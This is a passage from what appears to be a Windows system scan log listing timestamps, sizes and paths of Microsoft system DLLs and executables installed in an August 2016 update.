2016-08-18 23:19 - 2016-08-03 01:44 - 02495776 _____ C:\Windows\system32\CoreUIComponents.dll
2016-08-18 23:19 - 2016-08-03 01:44 - 02156400 _____ (Microsoft Corporation) C:\Windows\system32\hevcdecoder.dll
2016-08-18 23:19 - 2016-08-03 01:38 - 03625928 _____ (Microsoft Corporation) C:\Windows\system32\iertutil.dll
2016-08-18 23:19 - 2016-08-03 01:38 - 00252760 _____ (Microsoft Corporation) C:\Windows\system32\ContentDeliveryManager.Utilities.dll
2016-08-18 23:19 - 2016-08-03 01:32 - 00983904 _____ (Microsoft Corporation) C:\Windows\system32\SecConfig.efi
2016-08-18 23:19 - 2016-08-03 00:50 - 02902528 _____ (Microsoft Corporation) C:\Windows\system32\CertEnroll.dll
2016-08-18 23:19 - 2016-08-03 00:49 - 02446336 _____ C:\Windows\system32\InputService.dll
2016-08-18 23:19 - 2016-08-03 00:47 - 00553472 _____ (Microsoft Corporation) C:\Windows\system32\GamePanel.exe
2016-08-18 23:19 - 2016-08-03 00:47 - 00456704 _____ (Microsoft Corporation) C:\Windows\system32\certcli.dll
2016-08-18 23:19 - 2016-08-03 00:47 - 00293376 _____ C:\Windows\system32\TextInputFramework.dll
2016-08-18 23:19 - 2016-08-03 00:45 - 04847616 _____ (Microsoft Corporation) C:\Windows\system32\dbgeng.dll
2016-08-18 23:19 - 2016-08-03 00:44 - 00814592 _____ (Microsoft Corporation) C:\Windows\system32\provcore.dll
2016-08-18 23:19 - 2016-08-03 00:44 - 00328704 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MapConfiguration.dll
2016-08-18 23:19 - 2016-08-03 00:43 - 07055872 _____ (Microsoft Corporation) C:\Windows\system32\BingMaps.dll
2016-08-18 23:19 - 2016-08-03 00:42 - 02839040 _____ (Microsoft Corporation) C:\Windows\system32\Wpc.dll
2016-08-18 23:19 - 2016-08-03 00:42 - 02598912 _____ (Microsoft Corporation) C:\Windows\SysWOW64\CertEnroll.dll
2016-08-18 23:19 - 2016-08-03 00:42 - 02253824 _____ (Microsoft Corporation) C:\Windows\system32\WpcWebSync.dll
2016-08-18 23:19 - 2016-08-03 00:41 - 03119104 _____ (Microsoft Corporation) C:\Windows\system32\wininet.dll
2016-08-18 23:19 - 2016-08-03 00:41 - 01823232 _____ C:\Windows\SysWOW64\InputService.dll
2016-08-18 23:19 - 2016-08-03 00:41 - 01686528 _____ (Microsoft Corporation) C:\Windows\system32\ieapfltr.dll
2016-08-18 23:19 - 2016-08-03 00:41 - 01606656 _____ (Microsoft Corporation) C:\Windows\system32\urlmon.dll
2016-08-18 23:19 - 2016-08-03 00:41 - 00799232 _____ (Microsoft Corporation) C:\Windows\system32\wpccpl.dll
2016-08-18 23:19 - 2016-08-03 00:40 - 00338944 _____ (Microsoft Corporation) C:\Windows\SysWOW64\certcli.dll
2016-08-18 23:19 - 2016-08-03 00:40 - 00200704 _____ C:\Windows\SysWOW64\TextInputFramework.dll
2016-08-18 23:19 - 2016-08-03 00:38 - 03873280 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dbgeng.dll
2016-08-18 23:19 - 2016-08-03 00:38 - 00819712 _____ (Microsoft Corporation) C:\Windows\system32\licensingdiag.exe
2016-08-18 23:19 - 2016-08-03 00:37 - 04453888 _____ (Microsoft Corporation) C:\Windows\system32\D3DCompiler_47.dll
2016-08-18 23:19 - 2016-08-03 00:37 - 04168704 _____ (Microsoft Corporation) C:\Windows\system32\UIRibbon.dll
2016-08-18 23:19 - 2016-08-03 00:36 - 00584704 _____ (Microsoft Corporation) C:\Windows\SysWOW64\provcore.dll
2016-08-18 23:19 - 2016-08-03 00:35 - 01717760 _____ (Microsoft Corporation) C:\Windows\system32\GdiPlus.dll
2016-08-18 23:19 - 2016-08-03 00:35 - 00832512 _____ (Microsoft Corporation) C:\Windows\system32\MapsStore.dll
2016-08-18 23:19 - 2016-08-03 00:33 - 02587136 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wininet.dll
2016-08-18 23:19 - 2016-08-03 00:33 - 02198016 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Wpc.dll
2016-08-18 23:19 - 2016-08-03 00:33 - 01844736 _____ (Microsoft Corporation) C:\Windows\system32\workfolderssvc.dll
2016-08-18 23:19 - 2016-08-03 00:33 - 01418240 _____ (Microsoft Corporation) C:\Windows\system32\RecoveryDrive.exe
2016-08-18 23:19 - 2016-08-03 00:33 - 01387008 _____ (Microsoft Corporation) C:\Windows\SysWOW64\urlmon.dll
2016-08-18 23:19 - 2016-08-03 00:32 - 05079552 _____ (Microsoft Corporation) C:\Windows\SysWOW64\BingMaps.dll
2016-08-18 23:19 - 2016-08-03 00:32 - 01492992 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieapfltr.dll
2016-08-18 23:19 - 2016-08-03 00:32 - 00088576 _____ (Microsoft Corporation) C:\Windows\SysWOW64\olepro32.dll
2016-08-18 23:19 - 2016-08-03 00:30 - 00617472 _____ (Microsoft Corporation) C:\Windows\SysWOW64\licensingdiag.exe
2016-08-18 23:19 - 2016-08-03 00:30 - 00136192 _____ (Microsoft Corporation) C:\Windows\system32\dbgcore.dll
2016-08-18 23:19 - 2016-08-03 00:28 - 03692032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\D3DCompiler_47.dll
2016-08-18 23:19 - 2016-08-03 00:27 - 03443200 _____ (Microsoft Corporation) C:\Windows\SysWOW64\UIRibbon.dll
2016-08-18 23:19 - 2016-08-03 00:26 - 01467392 _____ (Microsoft Corporation) C:\Windows\SysWOW64\GdiPlus.dll
2016-08-18 23:19 - 2016-08-03 00:25 - 00565760 _____ (Microsoft Corporation) C:\Windows\SysWOW64\AzureSettingSyncProvider.dll
2016-08-18 23:19 - 2016-08-03 00:21 - 00404992 _____ (Microsoft Corporation) C:\Windows\SysWOW64\DbgModel.dll
2016-08-18 23:19 - 2016-08-03 00:20 - 00117760 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dbgcore.dll
2016-08-18 23:19 - 2016-06-24 00:56 - 01823760 _____ (Microsoft Corporation) C:\Windows\system32\crypt32.dll
2016-08-18 23:19 - 2016-06-24 00:25 - 01522632 _____ (Microsoft Corporation) C:\Windows\SysWOW64\crypt32.dll
2016-08-18 23:19 - 2016-05-28 01:02 - 04532304 _____ (Microsoft Corporation) C:\Windows\explorer.exe
2016-08-18 23:19 - 2016-05-28 01:00 - 02543784 _____ (Microsoft Corporation) C:\Windows\system32\d3d10warp.dll
2016-08-18 23:19 - 2016-05-28 01:00 - 01591304 _____ (Microsoft Corporation) C:\Windows\system32\gdi32.dll
2016-08-18 23:19 - 2016-05-28 00:39 - 04047288 _____ (Microsoft Corporation) C:\Windows\SysWOW64\explorer.exe
2016-08-18 23:19 - 2016-05-28 00:39 - 01365584 _____ (Microsoft Corporation) C:\Windows\SysWOW64\gdi32.dll
2016-08-18 23:19 - 2016-05-28 00:35 - 02188472 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3d10warp.dll
2016-08-18 23:19 - 2016-05-27 23:51 - 02119680 _____ (Microsoft Corporation) C:\Windows\system32\inetcpl.cpl
2016-08-18 23:19 - 2016-05-27 23:47 - 00078336 _____ (Microsoft Corporation) C:\Windows\system32\cryptsvc.dll
2016-08-18 23:19 - 2016-05-27 23:39 - 00667648 _____ (Microsoft Corporation) C:\Windows\SysWOW64\winhttp.dll
2016-08-18 23:19 - 2016-05-27 23:39 - 00624640 _____ (Microsoft Corporation) C:\Windows\system32\aadtb.dll
2016-08-18 23:19 - 2016-05-27 23:35 - 02042368 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inetcpl.cpl
2016-08-18 23:19 - 2016-04-09 06:53 - 01535032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntdll.dll
2016-08-18 23:19 - 2016-04-09 06:52 - 00502504 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3d10level9.dll
2016-08-18 23:19 - 2016-04-09 06:10 - 01824872 _____ (Microsoft Corporation) C:\Windows\system32\ntdll.dll
2016-08-18 23:19 - 2016-04-09 06:10 - 00609976 _____ (Microsoft Corporation) C:\Windows\system32\d3d10level9.dll
2016-08-18 23:19 - 2016-03-16 00:56 - 01022664 _____ (Microsoft Corporation) C:\Windows\system32\winresume.efi
2016-08-18 23:19 - 2016-03-16 00:55 - 01299032 _____ (Microsoft Corporation) C:\Windows\system32\winload.efi
2016-08-18 23:19 - 2016-03-16 00:55 - 01127024 _____ (Microsoft Corporation) C:\Windows\system32\winload.exe
2016-08-18 23:19 - 2016-03-15 23:42 - 02180608 _____ (Microsoft Corporation) C:\Windows\system32\AppXDeploymentServer.dll
2016-08-18 23:19 - 2016-03-15 23:39 - 03363328 _____ (Microsoft Corporation) C:\Windows\system32\msi.dll
2016-08-18 23:19 - 2016-03-15 23:39 - 00081920 _____ (Microsoft Corporation) C:\Windows\system32\AppxSysprep.dll
2016-08-18 23:19 - 2016-03-15 23:37 - 00114688 _____ (Microsoft Corporation) C:\Windows\system32\FontProvider.dll
2016-08-18 23:19 - 2016-03-15 23:36 - 00244736 _____ (Microsoft Corporation) C:\Windows\system32\cemapi.dll
2016-08-18 23:19 - 2016-03-15 23:35 - 01794560 _____ (Microsoft Corporation) C:\Windows\system32\AppXDeploymentExtensions.dll
2016-08-18 23:19 - 2016-03-15 23:35 - 00145408 _____ (Microsoft Corporation) C:\Windows\system32\dssvc.dll
2016-08-18 23:19 - 2016-03-15 23:34 - 01871872 _____ (Microsoft Corporation) C:\Windows\system32\msxml3.dll
2016-08-18 23:19 - 2016-03-15 23:32 - 00065024 _____ (Microsoft Corporation) C:\Windows\system32\basesrv.dll
2016-08-18 23:19 - 2016-03-15 23:17 - 03680256 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msi.dll
2016-08-18 23:19 - 2016-03-15 23:17 - 00168448 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.Devices.Scanners.dll
2016-08-18 23:19 - 2016-03-15 23:13 - 00201216 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cemapi.dll
2016-08-18 23:19 - 2016-03-15 23:11 - 01594368 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msxml3.dll
2016-08-18 23:19 - 2016-02-23 09:30 - 01643872 _____ (Microsoft Corporation) C:\Windows\system32\diagtrack.dll
2016-08-18 23:19 - 2016-02-23 07:59 - 00319488 _____ (Microsoft Corporation) C:\Windows\system32\NetworkBindingEngineMigPlugin.dll
2016-08-18 23:19 - 2016-02-23 07:45 - 00083968 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\serial.sys
2016-08-18 23:19 - 2016-02-23 07:04 - 00225792 _____ (Microsoft Corporation) C:\Windows\system32\wsqmcons.exe
2016-08-18 23:19 - 2016-02-23 06:46 - 00400384 _____ (Microsoft Corporation) C:\Windows\system32\sharemediacpl.dll
2016-08-18 23:19 - 2016-02-23 06:45 - 01844736 _____ (Microsoft Corporation) C:\Windows\system32\WMPDMC.exe
2016-08-18 23:19 - 2016-02-23 06:03 - 01495040 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WMPDMC.exe
2016-08-18 23:19 - 2016-01-31 02:23 - 02601160 _____ (Microsoft Corporation) C:\Windows\system32\combase.dll
2016-08-18 23:19 - 2016-01-31 02:23 - 01420392 _____ (Microsoft Corporation) C:\Windows\system32\msctf.dll
2016-08-18 23:19 - 2016-01-31 02:04 - 01180696 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msctf.dll
2016-08-18 23:19 - 2016-01-31 01:19 - 00046592 _____ (Microsoft Corporation) C:\Windows\SysWOW64\IoTAssignedAccessLockFramework.dll
2016-08-18 23:19 - 2016-01-04 23:07 - 00377592 _____ (Microsoft Corporation) C:\Windows\system32\MP4SDECD.DLL
2016-08-18 23:19 - 2016-01-04 23:06 - 01991120 _____ (Microsoft Corporation) C:\Windows\system32\WMVENCOD.DLL
2016-08-18 23:19 - 2016-01-04 23:06 - 01270104 _____ (Microsoft Corporation) C:\Windows\system32\mfnetsrc.dll
2016-08-18 23:19 - 2016-01-04 23:04 - 02641928 _____ (Microsoft Corporation) C:\Windows\system32\WMVDECOD.DLL
2016-08-18 23:19 - 2016-01-04 23:04 - 00862056 _____ (Microsoft Corporation) C:\Windows\system32\mfnetcore.dll
2016-08-18 23:19 - 2016-01-04 23:04 - 00787720 _____ (Microsoft Corporation) C:\Windows\system32\WMADMOD.DLL
2016-08-18 23:19 - 2016-01-04 23:04 - 00249464 _____ (Microsoft Corporation) C:\Windows\system32\RESAMPLEDMO.DLL
2016-08-18 23:19 - 2016-01-04 23:04 - 00115704 _____ (Microsoft Corporation) C:\Windows\system32\VIDRESZR.DLL
2016-08-18 23:19 - 2016-01-04 23:04 - 00083704 _____ (Microsoft Corporation) C:\Windows\system32\mfvdsp.dll
2016-08-18 23:19 - 2016-01-04 22:50 - 00723648 _____ (Microsoft Corporation) C:\Windows\system32\generaltel.dll
2016-08-18 23:19 - 2016-01-04 22:50 - 00345080 _____ (Microsoft Corporation) C:\Windows\system32\WMVSDECD.DLL
2016-08-18 23:19 - 2016-01-04 22:50 - 00205072 _____ (Microsoft Corporation) C:\Windows\system32\COLORCNV.DLL
2016-08-18 23:19 - 2016-01-04 22:30 - 02459096 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WMVDECOD.DLL
2016-08-18 23:19 - 2016-01-04 22:30 - 02162064 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WMVENCOD.DLL
2016-08-18 23:19 - 2016-01-04 22:30 - 00368776 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MP4SDECD.DLL
2016-08-18 23:19 - 2016-01-04 22:30 - 00232896 _____ (Microsoft Corporation) C:\Windows\SysWOW64\RESAMPLEDMO.DLL
2016-08-18 23:19 - 2016-01-04 22:28 - 00695752 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WMADMOD.DLL
2016-08-18 23:19 - 2016-01-04 22:28 - 00107952 _____ (Microsoft Corporation) C:\Windows\SysWOW64\VIDRESZR.DLL
2016-08-18 23:19 - 2016-01-04 22:28 - 00072808 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfvdsp.dll
2016-08-18 23:19 - 2016-01-04 22:10 - 00305776 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WMVSDECD.DLL
2016-08-18 23:19 - 2016-01-04 22:10 - 00188032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\COLORCNV.DLL
2016-08-18 23:19 - 2016-01-04 21:51 - 00634368 _____ (Microsoft Corporation) C:\Windows\system32\WMVXENCD.DLL
2016-08-18 23:19 - 2016-01-04 21:51 - 00447488 _____ (Microsoft Corporation) C:\Windows\system32\WMVSENCD.DLL
2016-08-18 23:19 - 2016-01-04 21:19 - 00747008 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WMVXENCD.DLL
2016-08-18 23:19 - 2016-01-04 21:19 - 00409088 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WMVSENCD.DLL
2016-08-18 23:19 - 2015-11-25 00:36 - 01710592 _____ (Microsoft Corporation) C:\Windows\system32\SRHInproc.dll
2016-08-18 23:19 - 2015-11-25 00:31 - 00121344 _____ (Microsoft Corporation) C:\Windows\system32\DAMM.dll
2016-08-18 23:19 - 2015-11-25 00:30 - 00171008 _____ (Microsoft Corporation) C:\Windows\system32\dot3mm.dll
2016-08-18 23:19 - 2015-11-25 00:29 - 01649152 _____ (Microsoft Corporation) C:\Windows\system32\comsvcs.dll
2016-08-18 23:19 - 2015-11-25 00:16 - 01442816 _____ (Microsoft Corporation) C:\Windows\SysWOW64\SRHInproc.dll
2016-08-18 23:19 - 2015-11-25 00:10 - 01328128 _____ (Microsoft Corporation) C:\Windows\SysWOW64\comsvcs.dll
2016-08-18 23:19 - 2015-11-05 00:12 - 00515072 _____ (Microsoft Corporation) C:\Windows\system32\internetmail.dll
2016-08-18 23:19 - 2015-11-05 00:10 - 02987520 _____ (Microsoft Corporation) C:\Windows\system32\esent.dll
2016-08-18 23:19 - 2015-11-04 23:35 - 02639872 _____ (Microsoft Corporation) C:\Windows\SysWOW64\esent.dll
2016-08-18 23:19 - 2015-11-04 23:34 - 00311296 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.Devices.Usb.dll
2016-08-18 23:19 - 2015-09-25 00:01 - 02573768 _____ (Microsoft Corporation) C:\Windows\system32\msxml6.dll
2016-08-18 23:19 - 2015-09-24 23:33 - 01997336 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msxml6.dll
2016-08-18 23:19 - 2015-09-24 23:02 - 00689152 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Security.Authentication.Web.Core.dll
2016-08-18 23:19 - 2015-09-24 22:37 - 00480256 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.Security.Authentication.Web.Core.dll
2016-08-18 23:19 - 2015-09-17 02:49 - 00501008 _____ (Microsoft Corporation) C:\Windows\system32\AudioEng.dll
2016-08-18 23:19 - 2015-09-17 02:48 - 00809352 _____ (Microsoft Corporation) C:\Windows\system32\CoreMessaging.dll
2016-08-18 23:19 - 2015-09-17 02:08 - 00053760 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Speech.Pal.dll
2016-08-18 23:19 - 2015-09-17 02:06 - 00149504 _____ (Microsoft Corporation) C:\Windows\system32\tetheringservice.dll
2016-08-18 23:19 - 2015-09-17 02:03 - 00267776 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Internal.Management.dll
2016-08-18 23:19 - 2015-09-17 02:00 - 00106496 _____ (Microsoft Corporation) C:\Windows\system32\KeywordDetectorMsftSidAdapter.dll
2016-08-18 23:19 - 2015-09-17 01:57 - 00137728 _____ (Microsoft Corporation) C:\Windows\system32\VEStoreEventHandlers.dll
2016-08-18 23:19 - 2015-09-17 01:55 - 01601536 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Media.Speech.dll
2016-08-18 23:19 - 2015-09-17 01:55 - 00120832 _____ (Microsoft Corporation) C:\Windows\system32\omadmclient.exe
2016-08-18 23:19 - 2015-09-17 01:52 - 01216512 _____ (Microsoft Corporation) C:\Windows\system32\netcenter.dll
2016-08-18 23:19 - 2015-09-17 01:52 - 01181696 _____ (Microsoft Corporation) C:\Windows\system32\wwansvc.dll
2016-08-18 23:19 - 2015-09-17 01:51 - 01203712 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Devices.Bluetooth.dll
2016-08-18 23:19 - 2015-09-17 01:50 - 00421888 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Internal.Bluetooth.dll
2016-08-18 23:19 - 2015-09-17 01:49 - 00041472 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.Speech.Pal.dll
2016-08-18 23:19 - 2015-09-17 01:48 - 00273920 _____ (Microsoft Corporation) C:\Windows\system32\Windows.ApplicationModel.LockScreen.dll
2016-08-18 23:19 - 2015-09-17 01:46 - 00928256 _____ (Microsoft Corporation) C:\Windows\system32\JpMapControl.dll
2016-08-18 23:19 - 2015-09-17 01:45 - 00193024 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.Internal.Management.dll
2016-08-18 23:19 - 2015-09-17 01:43 - 01213440 _____ (Microsoft Corporation) C:\Windows\system32\RemoteNaturalLanguage.dll
2016-08-18 23:19 - 2015-09-17 01:40 - 01162240 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.Media.Speech.dll
2016-08-18 23:19 - 2015-09-17 01:38 - 00058368 _____ (Microsoft Corporation) C:\Windows\SysWOW64\usoapi.dll
2016-08-18 23:19 - 2015-09-17 01:36 - 01171456 _____ (Microsoft Corporation) C:\Windows\SysWOW64\netcenter.dll
2016-08-18 23:19 - 2015-09-17 01:35 - 00828928 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.Devices.Bluetooth.dll
2016-08-18 23:19 - 2015-09-17 01:32 - 00195072 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.ApplicationModel.LockScreen.dll
2016-08-18 23:19 - 2015-09-17 01:26 - 00899584 _____ (Microsoft Corporation) C:\Windows\SysWOW64\RemoteNaturalLanguage.dll
2016-08-18 23:19 - 2015-09-17 01:16 - 00512000 _____ (Microsoft Corporation) C:\Windows\SysWOW64\CoreMessaging.dll
2016-08-18 23:19 - 2015-08-27 01:51 - 01774592 _____ (Microsoft Corporation) C:\Windows\system32\Windows.UI.Immersive.dll
2016-08-18 23:19 - 2015-08-27 01:16 - 01612288 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.UI.Immersive.dll
2016-08-18 23:19 - 2015-08-20 01:21 - 00193024 _____ (Microsoft Corporation) C:\Windows\system32\EnterpriseModernAppMgmtCSP.dll
2016-08-18 23:19 - 2015-08-18 02:56 - 00079872 _____ (Microsoft Corporation) C:\Windows\system32\BthRadioMedia.dll
2016-08-18 23:19 - 2015-08-18 02:52 - 01888768 _____ (Microsoft Corporation) C:\Windows\system32\dwmcore.dll
2016-08-18 23:19 - 2015-08-18 02:29 - 01593344 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dwmcore.dll
2016-08-18 23:19 - 2015-08-11 05:21 - 00052224 _____ (Microsoft Corporation) C:\Windows\system32\tetheringclient.dll
2016-08-18 23:19 - 2015-08-11 05:14 - 00404480 _____ C:\Windows\system32\diagtrack_wininternal.dll
2016-08-18 23:19 - 2015-08-11 05:07 - 00115712 _____ (Microsoft Corporation) C:\Windows\system32\MbaeParserTask.exe
2016-08-18 23:19 - 2015-08-11 04:50 - 00131584 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.UI.Core.TextInput.dll
2016-08-18 23:19 - 2015-08-08 02:24 - 02415104 _____ (Microsoft Corporation) C:\Windows\system32\DWrite.dll
2016-08-18 23:19 - 2015-08-08 02:24 - 01679360 _____ (Microsoft Corporation) C:\Windows\system32\FntCache.dll
2016-08-18 23:19 - 2015-08-08 02:00 - 01985024 _____ (Microsoft Corporation) C:\Windows\SysWOW64\DWrite.dll
2016-08-18 23:19 - 2015-08-05 23:17 - 00200528 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\wof.sys
2016-08-18 23:19 - 2015-08-02 21:21 - 00179712 _____ (Microsoft Corporation) C:\Windows\system32\coredpus.dll
2016-08-18 23:19 - 2015-08-02 21:18 - 00120832 _____ (Microsoft Corporation) C:\Windows\system32\NetworkStatus.dll
2016-08-18 23:19 - 2015-08-02 21:12 - 00081920 _____ (Microsoft Corporation) C:\Windows\SysWOW64\VEDataLayerHelpers.dll
2016-08-18 23:19 - 2015-07-30 02:16 - 02147080 _____ (Microsoft Corporation) C:\Windows\system32\d3d9.dll
2016-08-18 23:19 - 2015-07-30 00:26 - 01867160 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3d9.dll
2016-08-18 23:19 - 2015-07-30 00:24 - 00445240 _____ (Microsoft Corporation) C:\Windows\SysWOW64\AudioEng.dll
2016-08-18 23:19 - 2015-07-30 00:12 - 00287744 _____ (Microsoft Corporation) C:\Windows\system32\provhandlers.dll
2016-08-18 23:19 - 2015-07-29 23:46 - 02125312 _____ (Microsoft Corporation) C:\Windows\system32\twinui.appcore.dll
2016-08-18 23:19 - 2015-07-29 23:44 - 00229376 _____ (Microsoft Corporation) C:\Windows\system32\SensorService.dll
2016-08-18 23:19 - 2015-07-29 23:40 - 00846336 _____ (Microsoft Corporation) C:\Windows\system32\wpncore.dll
2016-08-18 23:19 - 2015-07-29 23:04 - 01714176 _____ (Microsoft Corporation) C:\Windows\SysWOW64\twinui.appcore.dll
2016-08-18 23:19 - 2015-07-25 23:49 - 04760576 _____ (Microsoft Corporation) C:\Windows\system32\ExplorerFrame.dll
2016-08-18 23:19 - 2015-07-25 23:38 - 04350464 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ExplorerFrame.dll
2016-08-18 23:19 - 2015-07-21 23:09 - 00296960 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.Internal.Bluetooth.dll
2016-08-18 23:19 - 2015-07-18 03:43 - 00575488 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.Media.Import.dll
2016-08-18 23:19 - 2015-07-18 01:17 - 00097128 _____ (Microsoft Corporation) C:\Windows\system32\bcd.dll
2016-08-18 23:19 - 2015-07-18 00:06 - 00841728 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Media.Import.dll
2016-08-18 23:19 - 2015-07-17 23:48 - 00176640 _____ (Microsoft Corporation) C:\Windows\system32\bcdboot.exe
2016-08-18 23:19 - 2015-07-14 21:57 - 00204288 _____ (Microsoft Corporation) C:\Windows\system32\OmaDmAgent.dll
2016-08-18 23:19 - 2015-07-13 21:51 - 00151040 _____ (Microsoft Corporation) C:\Windows\system32\TabSvc.dll
2016-08-18 23:19 - 2015-07-12 20:01 - 00342528 _____ (Microsoft Corporation) C:\Windows\system32\bcastdvr.exe
2016-08-18 23:19 - 2015-07-12 19:30 - 00275456 _____ (Microsoft Corporation) C:\Windows\SysWOW64\bcastdvr.exe
2016-08-18 23:19 - 2015-07-10 21:05 - 00263168 _____ (Microsoft Corporation) C:\Windows\system32\DisplayManager.dll
2016-08-18 23:19 - 2015-07-10 21:03 - 00065536 _____ (Microsoft Corporation) C:\Windows\system32\msiexec.exe
2016-08-18 23:19 - 2015-07-10 20:42 - 00191488 _____ (Microsoft Corporation) C:\Windows\SysWOW64\DisplayManager.dll
2016-08-18 23:19 - 2015-07-10 20:40 - 00058368 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msiexec.exe
2016-08-18 23:19 - 2015-07-10 06:10 - 00057856 _____ (Microsoft Corporation) C:\Windows\system32\hmkd.dll
2016-08-18 23:19 - 2015-07-10 05:29 - 00569344 _____ (Microsoft Corporation) C:\Windows\system32\MCRecvSrc.dll
2016-08-18 23:18 - 2016-08-03 02:25 - 00365120 _____ (Microsoft Corporation) C:\Windows\SysWOW64\bcryptprimitives.dll
2016-08-18 23:18 - 2016-08-03 02:15 - 00700256 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WWAHost.exe
2016-08-18 23:18 - 2016-08-03 01:46 - 01314496 _____ (Microsoft Corporation) C:\Windows\system32\ole32.dll
2016-08-18 23:18 - 2016-08-03 01:46 - 00601336 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\cng.sys
2016-08-18 23:18 - 2016-08-03 01:46 - 00432352 _____ (Microsoft Corporation) C:\Windows\system32\bcryptprimitives.dll
2016-08-18 23:18 - 2016-08-03 01:44 - 00388896 _____ (Microsoft Corporation) C:\Windows\system32\wmpps.dll
2016-08-18 23:18 - 2016-08-03 01:44 - 00243760 _____ (Microsoft Corporation) C:\Windows\system32\mfps.dll
2016-08-18 23:18 - 2016-08-03 01:38 - 00801632 _____ (Microsoft Corporation) C:\Windows\system32\WWAHost.exe
2016-08-18 23:18 - 2016-08-03 01:09 - 00954368 _____ (Microsoft Corporation) C:\Windows\system32\IKEEXT.DLL
2016-08-18 23:18 - 2016-08-03 00:46 - 00963072 _____ (Microsoft Corporation) C:\Windows\system32\WSShared.dll
2016-08-18 23:18 - 2016-08-03 00:46 - 00780288 _____ (Microsoft Corporation) C:\Windows\system32\Windows.ApplicationModel.Store.dll
2016-08-18 23:18 - 2016-08-03 00:46 - 00324096 _____ (Microsoft Corporation) C:\Windows\system32\Windows.ApplicationModel.Store.TestingFramework.dll
2016-08-18 23:18 - 2016-08-03 00:40 - 00572928 _____ (Microsoft Corporation) C:\Windows\system32\vbscript.dll
2016-08-18 23:18 - 2016-08-03 00:39 - 05448704 _____ (Microsoft Corporation) C:\Windows\system32\aclui.dll
2016-08-18 23:18 - 2016-08-03 00:39 - 00806912 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WSShared.dll
2016-08-18 23:18 - 2016-08-03 00:39 - 00775168 _____ (Microsoft Corporation) C:\Windows\system32\msfeeds.dll
2016-08-18 23:18 - 2016-08-03 00:39 - 00587776 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.ApplicationModel.Store.dll
2016-08-18 23:18 - 2016-08-03 00:39 - 00247808 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.ApplicationModel.Store.TestingFramework.dll
2016-08-18 23:18 - 2016-08-03 00:35 - 00902656 _____ (Microsoft Corporation) C:\Windows\system32\SearchIndexer.exe
2016-08-18 23:18 - 2016-08-03 00:35 - 00336384 _____ (Microsoft Corporation) C:\Windows\system32\SearchProtocolHost.exe
2016-08-18 23:18 - 2016-08-03 00:34 - 00584704 _____ (Microsoft Corporation) C:\Windows\system32\UIRibbonRes.dll
2016-08-18 23:18 - 2016-08-03 00:34 - 00179712 _____ (Microsoft Corporation) C:\Windows\system32\winsrv.dll
2016-08-18 23:18 - 2016-08-03 00:33 - 01061888 _____ (Microsoft Corporation) C:\Windows\system32\reseteng.dll
2016-08-18 23:18 - 2016-08-03 00:33 - 00123392 _____ (Microsoft Corporation) C:\Windows\system32\mssprxy.dll
2016-08-18 23:18 - 2016-08-03 00:32 - 00794112 _____ (Microsoft Corporation) C:\Windows\system32\BFE.DLL
2016-08-18 23:18 - 2016-08-03 00:32 - 00679936 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msfeeds.dll
2016-08-18 23:18 - 2016-08-03 00:31 - 05329408 _____ (Microsoft Corporation) C:\Windows\SysWOW64\aclui.dll
2016-08-18 23:18 - 2016-08-03 00:31 - 01096192 _____ (Microsoft Corporation) C:\Windows\system32\rdvidcrl.dll
2016-08-18 23:18 - 2016-08-03 00:26 - 00584704 _____ (Microsoft Corporation) C:\Windows\SysWOW64\UIRibbonRes.dll
2016-08-18 23:18 - 2016-08-03 00:26 - 00280576 _____ (Microsoft Corporation) C:\Windows\SysWOW64\SearchProtocolHost.exe
